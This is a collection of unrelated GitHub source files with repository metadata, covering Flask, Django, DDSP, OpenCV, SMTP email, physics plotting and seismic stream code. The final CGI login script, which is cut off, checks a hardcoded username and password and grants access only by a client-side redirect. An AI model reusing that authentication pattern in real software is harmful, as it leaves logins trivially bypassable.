cdc8c21405aec6c823c43ea65239bb0e860a6b6f
|
/setup.py
|
687a65aa8c3b54281b88b2444c4b79f9281be427
|
[
"Apache-2.0"
] |
permissive
|
antonini/TRX
|
ae8b4f4b77f702ccdb3571632ba3f27a5769628b
|
a66ed83f95e3597c89a02193179913e983065ff2
|
refs/heads/master
| 2021-01-12T12:50:14.468959 | 2016-09-22T19:26:46 | 2016-09-22T19:26:46 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 475 |
py
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description': 'TRX',
'author': 'Kyle Maxwell, based on Paterva\'s library',
'url': 'https://github.com/krmaxwell/TRX',
'download_url': 'https://github.com/krmaxwell/TRX',
'author_email': '[email protected]',
'version': '0.1',
'install_requires': ['nose'],
'packages': ['TRX'],
'scripts': [],
'name': 'TRX'
}
setup(**config)
|
[
"[email protected]"
] | |
b82ca425bb35c94f7141a7d5fb59cbea3e9c59b2
|
3194b35e8a93cf708f262dcf1cb070da330fc6a7
|
/flaskr/blog.py
|
3223c14b48527aefb0b290f5850897e4ee20bd8b
|
[] |
no_license
|
monkeysh1ne/flask-tutorial
|
2235014068a4bf9dd3fdd4119883ade2d0578fd0
|
06a5145714f93a3540e98f0d9daa26b4afd73d1e
|
refs/heads/master
| 2020-09-07T07:28:23.106552 | 2019-11-15T05:56:01 | 2019-11-15T05:56:01 | 220,682,389 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,608 |
py
|
from flask import (
Blueprint, flash, g, redirect, render_template, request, url_for
)
from werkzeug.exceptions import abort
from flaskr.auth import login_required
from flaskr.db import get_db
bp = Blueprint('blog', __name__)
@bp.route('/')
def index():
db = get_db()
posts = db.execute(
'SELECT p.id, title, body, created, author_id, username'
' FROM post p JOIN user u ON p.author_id = u.id'
' ORDER BY created DESC'
).fetchall()
return render_template('blog/index.html', posts=posts)
@bp.route('/create', methods=('GET', 'POST'))
@login_required
def create():
if request.method == 'POST':
title = request.form['title']
body = request.form['body']
error = None
if not title:
error = 'Title is required.'
if error is not None:
flash(error)
else:
db = get_db()
db.execute(
'INSERT INTO post (title, body, author_id)'
' VALUES (?, ?, ?)',
(title, body, g.user['id'])
)
db.commit()
return redirect(url_for('blog.index'))
return render_template('blog/create.html')
def get_post(id, check_author=True):
post = get_db().execute(
'SELECT p.id, title, body, created, author_id, username'
' FROM post p JOIN user u ON p.author_id = u.id'
' WHERE p.id = ?',
(id,)
).fetchone()
if post is None:
abort(404, "Post id {0} doesn't exist.".format(id))
if check_author and post['author_id'] != g.user['id']:
abort(403)
return post
@bp.route('/<int:id>/update', methods=('GET', 'POST'))
@login_required
def update(id):
post = get_post(id)
if request.method == 'POST':
title = request.form['title']
body = request.form['body']
error = None
if not title:
error = 'Title is required.'
if error is not None:
flash(error)
else:
db = get_db()
db.execute(
'UPDATE post SET title = ?, body = ?'
' WHERE id = ?',
(title, body, id)
)
db.commit()
return redirect(url_for('blog.index'))
return render_template('blog/update.html', post=post)
@bp.route('/<int:id>/delete', methods=('POST',))
@login_required
def delete(id):
get_post(id)
db = get_db()
    db.execute('DELETE FROM post WHERE id = ?', (id,))
db.commit()
return redirect(url_for('blog.index'))
|
[
"[email protected]"
] | |
a645386e0c34474857014299151a5d45a2ce0535
|
b8115bc7503581bf3bb44bfa87b270793aff4381
|
/ddsp/training/data_preparation/ddsp_prepare_tfrecord.py
|
f7a4c0f3576f5ff085e50c33af5f4a887ed246f2
|
[
"Apache-2.0"
] |
permissive
|
pollinations/ddsp
|
7a5cfd18efcd8a77729d26231d294a4c03c2d286
|
4bbb3b1b0aa9e9a4c1f77e8758f409cbd1ec03f7
|
refs/heads/main
| 2023-06-21T18:21:37.230721 | 2021-07-22T09:45:54 | 2021-07-22T09:45:54 | 388,399,770 | 0 | 0 |
Apache-2.0
| 2021-07-22T09:14:11 | 2021-07-22T09:14:10 | null |
UTF-8
|
Python
| false | false | 3,340 |
py
|
# Copyright 2021 The DDSP Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
r"""Create a TFRecord dataset from audio files.
Usage:
====================
ddsp_prepare_tfrecord \
--input_audio_filepatterns=/path/to/wavs/*wav,/path/to/mp3s/*mp3 \
--output_tfrecord_path=/path/to/output.tfrecord \
--num_shards=10 \
--alsologtostderr
"""
from absl import app
from absl import flags
from ddsp.training.data_preparation.prepare_tfrecord_lib import prepare_tfrecord
import tensorflow.compat.v2 as tf
FLAGS = flags.FLAGS
flags.DEFINE_list('input_audio_filepatterns', [],
'List of filepatterns to glob for input audio files.')
flags.DEFINE_string(
'output_tfrecord_path', None,
'The prefix path to the output TFRecord. Shard numbers will be added to '
'actual path(s).')
flags.DEFINE_integer(
'num_shards', None,
'The number of shards to use for the TFRecord. If None, this number will '
'be determined automatically.')
flags.DEFINE_integer('sample_rate', 16000,
'The sample rate to use for the audio.')
flags.DEFINE_integer(
'frame_rate', 250,
'The frame rate to use for f0 and loudness features. If set to 0, '
'these features will not be computed.')
flags.DEFINE_float(
'example_secs', 4,
'The length of each example in seconds. Input audio will be split to this '
'length using a sliding window. If 0, each full piece of audio will be '
'used as an example.')
flags.DEFINE_float(
'sliding_window_hop_secs', 1,
'The hop size in seconds to use when splitting audio into constant-length '
'examples.')
flags.DEFINE_float(
'eval_split_fraction', 0.0,
'Fraction of the dataset to reserve for eval split. If set to 0, no eval '
'split is created.'
)
flags.DEFINE_float(
'coarse_chunk_secs', 20.0,
'Chunk size in seconds used to split the input audio files.')
flags.DEFINE_list(
'pipeline_options', '--runner=DirectRunner',
'A comma-separated list of command line arguments to be used as options '
'for the Beam Pipeline.')
def run():
input_audio_paths = []
for filepattern in FLAGS.input_audio_filepatterns:
input_audio_paths.extend(tf.io.gfile.glob(filepattern))
prepare_tfrecord(
input_audio_paths,
FLAGS.output_tfrecord_path,
num_shards=FLAGS.num_shards,
sample_rate=FLAGS.sample_rate,
frame_rate=FLAGS.frame_rate,
window_secs=FLAGS.example_secs,
hop_secs=FLAGS.sliding_window_hop_secs,
eval_split_fraction=FLAGS.eval_split_fraction,
coarse_chunk_secs=FLAGS.coarse_chunk_secs,
pipeline_options=FLAGS.pipeline_options)
def main(unused_argv):
"""From command line."""
run()
def console_entry_point():
"""From pip installed script."""
app.run(main)
if __name__ == '__main__':
console_entry_point()
|
[
"[email protected]"
] | |
3bbfd86396dc378104b0ad258757a4707150a004
|
fca6dcc1fbb1acc698ee21599c0a3f7abbff36b9
|
/5. Additional materials/contextmanager.py
|
be0d7a54b8a048f679459bf68601fefbcbc4423d
|
[] |
no_license
|
megaes/CGScripting
|
69b1a62aecd72e489a7535c36e1301c51df2b5e1
|
c7cc3a11c479e1a8e0ef9d17abeaa6e3804986f9
|
refs/heads/master
| 2021-09-21T19:26:57.914055 | 2018-08-30T17:35:32 | 2018-08-30T17:35:32 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 457 |
py
|
import time
"""The file will be closed automatically"""
with open('c:/file') as f:
print f.read()
"""This class can be used with a context manager: some actions will be done before and after the main action"""
class timer(object):
def __enter__(self):
self.t = time.time()
def __exit__(self, exc_type, exc_val, exc_tb):
print 'Time:', time.time() - self.t, 'seconds'
with timer():
for i in range(5000):
print i
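# The same timing idea, written with contextlib's generator-based helper (an
# equivalent sketch in the file's Python 2 style; everything before the yield
# runs on entry, the finally-block runs on exit):
from contextlib import contextmanager

@contextmanager
def timer_gen():
    t = time.time()
    try:
        yield
    finally:
        print 'Time:', time.time() - t, 'seconds'

with timer_gen():
    sum(range(5000))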
|
[
"[email protected]"
] | |
0253f89a91fb0b17bcc6d9619da3aa727880d474
|
04d191ecce6071515d9ad97878289d101062cab7
|
/Contur.py
|
e3d87fc55518437b2aeba58cd8116a5dd64a6ffe
|
[] |
no_license
|
Alloyer/Physics
|
1133256014885f816f2311aca55dccf8eb435926
|
10f514420287931d31b31e9069326f552d54edea
|
refs/heads/main
| 2023-04-22T06:34:39.498362 | 2021-05-09T17:37:34 | 2021-05-09T17:37:34 | 365,811,377 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,226 |
py
|
from math import *
import matplotlib.pyplot as plt
import numpy as np
### CONSTANTS ###
c = 299792458 # m/s
k_B = 8.617333262 * pow(10, -5) # eV * K^-1
m = 15.994915 # amu
T = 1000 # K
lambda_S0_CONST = 6.62 * pow(10, -6) # A
lambda_0_CONST = 792.23 # A
T_e = 10000 # K
N_e = pow(10, 16) # cm^-3
#################
class Contur:
    def Calculate_Freq_from_lambda(self, wave_length):
        return pow(10, 8) / wave_length
    # constructor
def __init__(self, input_lambda_0, input_lambda_S0):
if(input_lambda_0 != None):
self.lambda_0 = input_lambda_0
else:
self.lambda_0 = lambda_0_CONST
if(input_lambda_S0 != None):
self.lambda_S0 = input_lambda_S0
else:
self.lambda_S0 = lambda_S0_CONST
self.HWHM_Doppler = (self.lambda_0 / c) * sqrt(2 * k_B * log(2) * T / m)
self.freq_HWHM_Doppler = self.Calculate_Freq_from_lambda(self.HWHM_Doppler)
self.HWHM_Stark = (self.lambda_S0 * pow(T_e / pow(10, 4), (1/3))) * (N_e / pow(10, 16))
self.freq_HWHM_Stark = self.Calculate_Freq_from_lambda(self.HWHM_Stark)
self.freq_Voigt = 0.5 * self.freq_HWHM_Stark + sqrt(1/4 * self.freq_HWHM_Stark**2 + self.freq_HWHM_Doppler**2)
self.C2 = self.freq_HWHM_Stark / self.freq_Voigt
self.C3 = 2 * pow(10, -4) * self.freq_Voigt * (1.065 + 0.447 * self.C2 + 0.058 * self.C2**2)
self.C1 = (1 - self.C2) / self.C3
self.C4 = self.C2 / self.C3
self.freq_0 = self.Calculate_Freq_from_lambda(self.lambda_0)
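    # For reference, the standard line-broadening relations the constructor
    # implements: the Doppler half width is
    #   HWHM_D = (lambda_0 / c) * sqrt(2 * k_B * T * ln(2) / m)
    # and the Stark half width scales as
    #   HWHM_S = lambda_S0 * (T_e / 10^4)^(1/3) * (N_e / 10^16)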
def Calculate_b_v(self, freq):
freq = freq - self.freq_0
D = abs(self.Calculate_Freq_from_lambda(self.lambda_0) - freq) / (2 * self.freq_Voigt)
D2 = pow(D, 2.25)
first = (self.C1 * exp(-2.882 * (D**2)))
second = (self.C4 / (1 + 4 * (D**2)))
third = ((0.016 * self.C4 * (1 - self.freq_HWHM_Stark / self.freq_Voigt)) * (exp(-0.4 * D2) - (1 / (1 + 0.1 * D2))))
b_v = 0.0001 * ( first + second + third)
return b_v
    # "Draw plot" helper - computes the profile and renders it
def Draw_Plot(self, From, To, Number_of_points = 100):
x_axes = np.linspace(From, To, Number_of_points) #1500000000000000
y_axes = np.array([self.Calculate_b_v(x) for x in x_axes])
        fig, ax = plt.subplots() # a single figure with one set of axes, holding:
        ax.plot(x_axes, y_axes, color="blue", label="b_v(freq)") # the profile b_v(freq) in blue
        ax.set_xlabel("freq") # label for the horizontal x axis
        ax.set_ylabel("I") # label for the vertical y axis
        # ax.set_ylim(pow(10, -16) * 3.465, pow(10, -16) * 3.466)
        ax.legend() # show the legend
plt.show()
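# Example usage (a sketch only; the plotting window around freq_0 is an
# assumption, not taken from the original file):
# contur = Contur(None, None)  # fall back to the module-level constants
# contur.Draw_Plot(contur.freq_0 - 10, contur.freq_0 + 10, Number_of_points=200)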
|
[
"[email protected]"
] | |
69164bbea98c02532b7343c5e57bd6723e642a62
|
758ba574aa10ae67214a1116808e2f8e3ee43449
|
/prac_04/list_comprehensions.py
|
9b2e2ed38d21cfc986339f75d77a517cd5d99163
|
[] |
no_license
|
app-1/Practicals
|
d2d5bb44cec8c5516b6e1ec650db920d21d307ef
|
64e54e8ae299add47f8b3593d4cae8be098f81c7
|
refs/heads/master
| 2021-01-19T18:25:24.857704 | 2017-09-13T03:43:39 | 2017-09-13T03:43:39 | 101,135,228 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,175 |
py
|
"""
CP1404/CP5632 Practical
List comprehensions
"""
names = ["Bob", "Angel", "Jimi", "Alan", "Ada"]
full_names = ["Bob Martin", "Angel Harlem", "Jimi Hendrix", "Alan Turing",
"Ada Lovelace"]
# for loop that creates a new list containing the first letter of each name
first_initials = []
for name in names:
first_initials.append(name[0])
print(first_initials)
# list comprehension that does the same thing
first_initials = [name[0] for name in names]
print(first_initials)
# list comprehension that creates a list containing tuples of both initials
# splits each name and adds the first letter of each part to a tuple
full_initials = [(name.split()[0][0], name.split()[1][0]) for name in
full_names]
print(full_initials)
almost_numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
# TODO: use a list comprehension to create a list of integers
# from this list of strings
numbers = [int(number) for number in almost_numbers]
print(numbers)
# TODO: use a list comprehension to create a list of all of the full_names
# in lowercase format
lowercase_full_names = [name.lower() for name in full_names]
print(lowercase_full_names)
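# Extra illustration (not part of the practical): the same pattern extends to
# dict comprehensions, e.g. mapping each name to its first initial.
name_to_initial = {name: name[0] for name in names}
print(name_to_initial)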
|
[
"[email protected]"
] | |
62f8f6e45e2c8fa0b96b0ee822ef9e2ee1a0d83b
|
44a7b4879c1da661cc2e8aa51c7fcc24cfb0fd3b
|
/src/scs_core/osio/manager/user_manager.py
|
f14e3e70118f2019ef5dd083551e6ca93ec113de
|
[
"MIT"
] |
permissive
|
seoss/scs_core
|
21cd235c9630c68f651b9a8c88120ab98fe5f513
|
a813f85f86b6973fa77722a7d61cc93762ceba09
|
refs/heads/master
| 2021-08-08T08:09:56.905078 | 2020-04-16T19:46:52 | 2020-04-16T19:46:52 | 156,239,538 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,315 |
py
|
"""
Created on 21 Mar 2017
@author: Bruno Beloff ([email protected])
"""
from scs_core.osio.client.rest_client import RESTClient
from scs_core.osio.data.user import User
from scs_core.osio.data.user_metadata import UserMetadata
# --------------------------------------------------------------------------------------------------------------------
class UserManager(object):
"""
classdocs
"""
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, http_client, api_key):
"""
Constructor
"""
self.__rest_client = RESTClient(http_client, api_key)
# ----------------------------------------------------------------------------------------------------------------
def find(self, user_id):
request_path = '/v1/users/' + user_id
# request...
self.__rest_client.connect()
try:
response_jdict = self.__rest_client.get(request_path)
except RuntimeError:
response_jdict = None
self.__rest_client.close()
user = User.construct_from_jdict(response_jdict)
return user
def find_public(self, user_id):
request_path = '/v1/public/users/' + user_id
# request...
self.__rest_client.connect()
try:
response_jdict = self.__rest_client.get(request_path)
except RuntimeError:
response_jdict = None
self.__rest_client.close()
user = UserMetadata.construct_from_jdict(response_jdict)
return user
def find_members_of_org(self, org_id):
pass
# ----------------------------------------------------------------------------------------------------------------
def update(self, user_id, user):
request_path = '/v1/users/' + user_id
# request...
self.__rest_client.connect()
try:
self.__rest_client.put(request_path, user.as_json())
finally:
self.__rest_client.close()
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "UserManager:{rest_client:%s}" % self.__rest_client
|
[
"[email protected]"
] | |
f0314427b5fc397267fc0589358f06e65ed0710d
|
afa287d9c6e0a4e3a556fc23d444ad2130a05120
|
/HW07/generate.py
|
5d1d7820978a0970dbd51156692093e32221f37f
|
[] |
no_license
|
zhangzhy52/cs759-High-Performance-Computing
|
ef0270ded30070245294279e52b31f4e9f64f9d7
|
e1c2299607e140c1008852556f457eb984ad8eb7
|
refs/heads/master
| 2021-09-03T19:25:56.910529 | 2018-01-11T11:52:45 | 2018-01-11T11:52:45 | 109,479,190 | 3 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 429 |
py
|
import numpy as np
def arrToFile (filename, array):
nrows, ncols = array.shape
f = open(filename , 'w')
for i in range(nrows):
for j in range(ncols):
f.write (str(array[i,j]) + "\n")
f.close()
if __name__ == '__main__':
    # np.random.random_integers was removed from modern NumPy; randint's upper
    # bound is exclusive, so 11 preserves the inclusive range [-10, 10].
    A = np.random.randint(-10, 11, size=(16, 32))
    b = np.random.randint(-10, 11, size=(32, 1))
arrToFile ('inputA.inp', A)
arrToFile ('inputB.inp', b)
    print(A[-1, :].dot(b))  # quick sanity check: last row of A times b
|
[
"[email protected]"
] | |
8e1fb53a12cc8169be23e1cdcdc37884cdf551ec
|
a6cbc03780b5c390f4f8ce9063bd8a7f6d75e8aa
|
/mail2.py
|
1c0dfcd906c6beffc8d5efcafb1c822ea969e238
|
[] |
no_license
|
KimaruThagna/Email_and_Regex
|
5f825554bd17e56ff091a79187c5ab7a758960d9
|
c250e37d6e09f1a9c35fb6af873ff1c77707a8fd
|
refs/heads/master
| 2021-09-06T11:59:04.784389 | 2018-02-06T12:16:58 | 2018-02-06T12:16:58 | 110,789,925 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,992 |
py
|
#This example still uses gmail but this time includes an attachment
import os,smtplib
from email.mime.text import MIMEText
from email.encoders import encode_base64
from email.mime.multipart import MIMEMultipart
from tkinter.filedialog import askopenfilename
from email.mime.base import MIMEBase
# function that sends the email. Feed it with relevant parameters
def sendMail(sender,pwd,subject,body,receiver,q):
message=MIMEMultipart() # define the whole message as a mimemultipart and add releven
#metadata
message['Subject']=subject
message['From']=sender
message['To']=receiver
text=MIMEText(body)
message.attach(text)# attach the body or actual message to the message object
if q=='y':
        file = askopenfilename()  # open a dialog to browse the file system and pick a file
data=open(file,'rb').read() # read file in binary mode
part=MIMEBase('application','octet-stream')
part.set_payload(data) # set the payload as the file read in binary mode
encode_base64(part) #encode the attachment to base64
        part.add_header('Content-Disposition', 'attachment; filename=' + os.path.basename(file))
message.attach(part)
print('Connecting ...')
server=smtplib.SMTP('smtp.gmail.com',587) # setup email server
server.ehlo() # identify yourself to gmail client
server.starttls() # start transport layer security
server.ehlo() #re-identify yourself after encryption
server.login(sender,pwd) # login to sender account
print('Connected')
server.sendmail(sender,receiver,message.as_string()) # perform actual sending of mail
print('Mail Sent.')
server.quit()
#prompts
sender=input('Input Your email ')
receiver=input('Provide Recepient ')
pwd=input('Provide password ' )
subject=input('Mail Subject ')
body=input('Type your message ')
con=input('Do you want to send an attachment? Enter y for YES ')
#call method
sendMail(sender,pwd,subject,body,receiver,con)
|
[
"[email protected]"
] | |
2db16db5c0570084ec0dbb9abc064697f824fa90
|
f51aff57f826aeea1be21e2d0c03cce0adaadefc
|
/exp/utils/rand.py
|
70cd3809130978b9f18a56c77772c3f8afb2594d
|
[
"MIT"
] |
permissive
|
zv5dmjq5/vivit
|
0a26f8b61e6f00da75fce7a9bbc75b0185ffea76
|
a05f448d1badb2db42e724c80676ce7e309194d2
|
refs/heads/master
| 2023-07-12T06:36:10.627912 | 2021-08-26T12:02:59 | 2021-08-26T12:02:59 | 370,409,161 | 1 | 0 |
MIT
| 2021-08-10T12:58:27 | 2021-05-24T16:00:04 |
Python
|
UTF-8
|
Python
| false | false | 1,198 |
py
|
"""Utility functions to control random seeds."""
import torch
class temporary_seed:
"""Temporarily set PyTorch seed to a different value, then restore current value.
This has the effect that code inside this context does not influence the outer
loop's random generator state.
"""
def __init__(self, temp_seed):
self._temp_seed = temp_seed
def __enter__(self):
"""Store the current seed."""
self._old_state = torch.get_rng_state()
torch.manual_seed(self._temp_seed)
def __exit__(self, exc_type, exc_value, traceback):
"""Restore the old random generator state."""
torch.set_rng_state(self._old_state)
def test_temporary_seed():
"""Test if temporary_seed works as expected."""
torch.manual_seed(3)
num1 = torch.rand(1)
with temporary_seed(2):
num2 = torch.rand(1)
num3 = torch.rand(1)
torch.manual_seed(3)
num4 = torch.rand(1)
num5 = torch.rand(1)
torch.manual_seed(2)
num6 = torch.rand(1)
assert torch.allclose(num1, num4)
assert torch.allclose(num3, num5)
assert torch.allclose(num2, num6)
if __name__ == "__main__":
test_temporary_seed()
|
[
"Anonymous"
] |
Anonymous
|
a02fe7d684c93e479473a43170637acca1d3c53d
|
11db9251522c2c3850dee4495ee66e8a969b051d
|
/facedetectcam.py
|
59cd14e7a2ebbd537a03610d49278503724e7752
|
[] |
no_license
|
RayDragon/Opencv-Face
|
7b496797e15ac84b7315d367135b9d1b26d33242
|
b2b8ef7d2eedf68ebef6779b5bfb5704dee2b181
|
refs/heads/master
| 2021-07-18T16:33:50.860004 | 2017-10-25T02:05:54 | 2017-10-25T02:05:54 | 108,206,829 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 561 |
py
|
import cv2
camera = cv2.VideoCapture(0)
cascade = cv2.CascadeClassifier("FDM/haarcascade_frontalface_default.xml")
while True:
retval, pict = camera.read()
faces = cascade.detectMultiScale(pict,scaleFactor=1.1,minNeighbors=5,minSize=(30, 30),flags=cv2.CASCADE_SCALE_IMAGE)
for (x, y, w, h) in faces:
cv2.rectangle(pict, (x, y), (x + w, y + h), (0, 255, 0), 2)
cv2.imshow("Faces found", pict)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything done, release the capture
camera.release()
cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
20a501ad1afd7a17f50785678b12fba3bf55851b
|
8f65f9232208921ec2645b11ec62e6b1b958e32e
|
/catalog/urls.py
|
94946ba9eb3fc834165642047fde1e9269b9d830
|
[] |
no_license
|
jdalzatec/Learning-Django
|
ca8a11c8a25841ed09b318e00ea8d7a1b0a586dc
|
e6ae2080fddb7bea1c4a7f3a24732d4896100592
|
refs/heads/master
| 2020-03-26T13:26:22.363870 | 2018-08-22T05:30:46 | 2018-08-22T05:30:46 | 144,939,145 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,164 |
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name="index"),
path('books', views.BookListView.as_view(), name="books"),
path('book/<int:pk>', views.BookDetailView.as_view(), name='book-detail'),
path('authors', views.AuthorListView.as_view(), name="authors"),
path('authors/<int:pk>', views.AuthorDetailView.as_view(), name="author-detail"),
path('mybooks/', views.LoanedBooksByUserListView.as_view(), name="my-borrowed"),
path('allborrowed/', views.LoanedBooksListView.as_view(), name="all-borrowed"),
path('book/<uuid:pk>/renew/', views.renew_book_librarian, name="renew-book-librarian"),
path('author/create/', views.AuthorCreate.as_view(), name="author-create"),
path('author/<int:pk>/update/', views.AuthorUpdate.as_view(), name="author-update"),
path('author/<int:pk>/delete/', views.AuthorDelete.as_view(), name="author-delete"),
path('book/create/', views.BookCreate.as_view(), name="book-create"),
path('book/<int:pk>/update/', views.BookUpdate.as_view(), name="book-update"),
path('book/<int:pk>/delete/', views.BookDelete.as_view(), name="book-delete"),
]
|
[
"[email protected]"
] | |
aeab9d49d772c2d77f897b4369b6a216e4f2c638
|
99a5f8d01c0219a1883bb4b06fd8c7c04a43b0ee
|
/src/main.py
|
bce9ba1b4b099c9ea3abe8d8fec0ef1bb8879b3a
|
[] |
no_license
|
ElenaCerezoSwing/kaggle_competiton
|
ec973a41a4091d66308a5471de4bf5a9dc9f671d
|
a3626ae6ae558e1b9d20d596903bef9b508107b3
|
refs/heads/master
| 2020-08-11T22:32:33.791285 | 2019-10-12T21:56:56 | 2019-10-12T21:56:56 | 214,640,072 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,551 |
py
|
from data_tasks import load_train_data, load_test_data, save_data, get_dataframe_copy
from cleaning import get_cleaner_data, get_random_forest_cleaner_data
from assign import assign_X_y, get_splitted_train_test, assign_y_to_submitted
from modelize import get_linear_regression_model, get_k_neighbors_model, get_ridge_model, get_sgd_model
from output_generator import linear_model_generator, k_neigh_model_generator, sgd_model_generator, ridge_model_generator, random_forest_model_generator
from standarize import get_standard_scaler
def main():
print('starting etl')
train = load_train_data()
train_normal = get_dataframe_copy(train)
test = load_test_data()
test_normal = get_dataframe_copy(test)
train_normal = get_cleaner_data(train_normal)
train_normal = train_normal.dropna()
    test_normal = get_cleaner_data(test_normal)
    X_normal, y_normal = assign_X_y(train_normal)
    linear_model_generator(X_normal, y_normal, test_normal)
    k_neigh_model_generator(X_normal, y_normal, test_normal)
    sgd_model_generator(X_normal, y_normal, test_normal)
    ridge_model_generator(X_normal, y_normal, test_normal)
print('processing randomForest Model')
X, y = assign_X_y(train)
X_test = test
X_test = get_random_forest_cleaner_data(X_test)
X = get_random_forest_cleaner_data(X)
X_transform, X_test_transform = get_standard_scaler(X, X_test)
X_transform = X_transform.fillna(0)
X_test_transform = X_test_transform.fillna(0)
random_forest_model_generator(X_transform, y, X_test_transform)
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
878ddaf62f61de755b7fb4fef4624b7ecbf5a5d8
|
d442bfa7e1402c08ae15e9d1612fc6ed1d5b07b2
|
/detector/send_receive/test/njsp_tester2.py
|
bdfa36174868d485dd781638ae1406a87d09bc5c
|
[] |
no_license
|
alex0sunny/Detector
|
098a59720e567166fe8a4432d912beea19020a77
|
281a060d8435fbaf52f86fc9ff25725657215fc4
|
refs/heads/master
| 2022-08-08T20:39:20.337239 | 2022-08-04T07:53:34 | 2022-08-04T07:53:34 | 210,623,771 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,472 |
py
|
import logging
import numpy as np
from queue import Queue, Empty
from time import sleep
from matplotlib import pyplot
from obspy import Stream, Trace, UTCDateTime
from detector.send_receive.njsp.njsp import NJSP
show_signal = True
host = 'localhost'
port = 10012
station = 'NDYY'
sample_rate = init_packet = check_time = None
logpath = None
loglevel = logging.DEBUG
format = '%(levelname)s %(asctime)s %(funcName)s %(filename)s:%(lineno)d %(message)s'
logging.basicConfig(level=loglevel, filename=logpath, format=format)
logger = logging.getLogger('router')
logging.getLogger("matplotlib").setLevel(logging.WARNING)
logging.getLogger("gpsd").setLevel(logging.WARNING)
njsp = NJSP(logger=logger, log_level=logging.DEBUG)
njsp_params = {
'reconnect': True,
'reconnect_period': 10,
'bson': True,
'handshake': {
'subscriptions': ['status', 'log', 'streams', 'alarms'],
'flush_buffer': False,
'client_name': 'TRIG'
}
}
njsp_queue = Queue(100)
reader1 = njsp.add_reader(host, port, 'TRIG', njsp_params, njsp_queue)
# reader2 = njsp.add_reader('localhost', 10011, 'TRIG', njsp_params, njsp_queue)
while not njsp.is_alive(reader1):
logger.info(f'{reader1} connecting...')
sleep(1)
if show_signal:
pyplot.ion()
figure = pyplot.figure()
st = Stream()
while True:
try:
packets_data = njsp_queue.get(timeout=1)
except Empty:
logger.info('no data')
continue
for conn_name, dev_packets in packets_data.items():
for packet_type, content in dev_packets.items():
if 'streams' == packet_type and station in content and sample_rate:
for stream_name, stream_data in content.items():
if stream_name == station:
starttime = UTCDateTime(stream_data['timestamp'])
for ch_name, bytez in stream_data['samples'].items():
#stream_data['samples'][ch_name] = len(stream_data['samples'][ch_name])
if show_signal:
tr = Trace()
tr.stats.starttime = starttime
tr.stats.sampling_rate = sample_rate
tr.stats.channel = ch_name
tr.data = np.frombuffer(bytez, 'int')
st += tr
if not check_time:
check_time = starttime
if show_signal and starttime > check_time + 1:
check_time = starttime
st.sort().merge()
st.trim(starttime=st[0].stats.endtime - 10)
pyplot.clf()
st.plot(fig=figure)
pyplot.show()
pyplot.pause(.1)
logger.debug(f'stream content, streams:{list(content.keys())} sample_rate:{sample_rate}')
if packet_type == 'parameters' and station in content['streams']:
for stream in list(content['streams'].keys()):
if stream != station:
del content['streams'][stream]
init_packet = content
print('init_packet:', init_packet)
sample_rate = content['streams'][station]['sample_rate']
#logger.debug('packets:\n' + str(packets_data))
|
[
"[email protected]"
] | |
c41fbd8fb280c104bb9a6dbd7dccac03142c3685
|
91c314460f7fac42e1198b9fef2978bdadd3d214
|
/test_proj3/test_proj3/urls.py
|
26987996903456a63db0bf51e626d1de1a259cad
|
[] |
no_license
|
g-merrill/proj3-test-repo
|
f03d136fd695dddcb257cd9f636d9c7ed727ee9d
|
5e9235b7d55539e775fe07d87a60a91552195b9a
|
refs/heads/master
| 2020-07-23T18:41:47.575956 | 2019-09-10T22:33:37 | 2019-09-10T22:33:37 | 207,670,599 | 0 | 2 | null | 2019-09-10T22:33:38 | 2019-09-10T21:59:21 |
Python
|
UTF-8
|
Python
| false | false | 752 |
py
|
"""test_proj3 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
|
[
"[email protected]"
] | |
405861d4482cedf6d0dcaa32d21b8a8bff19a759
|
97de3ec78108f9380e78237b9a582f1fc697d199
|
/cgi-bin/login.py
|
8e0b0402c55a16b4317a81f60445d43e46f6409e
|
[] |
no_license
|
siddartha19/Login-Form
|
50706921c18987a9d996ba74f20b3bb90691b287
|
535915d859352c5be0bdc7b04be2fd242a374360
|
refs/heads/master
| 2020-03-31T21:18:13.298939 | 2019-02-05T14:34:45 | 2019-02-05T14:34:45 | 151,095,668 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 373 |
py
|
import cgi
import sqlite3
print("Content-type:text/html\r\n")
form = cgi.FieldStorage()
un= form.getvalue("un")
up = form.getvalue("pwd")
if un=="chandu" and up=="519":
print("<script>window.location.href='http://localhost:8000/test.html';</script>")
else:
#if un=="chandu":
# print("WRONG PASSWORD")
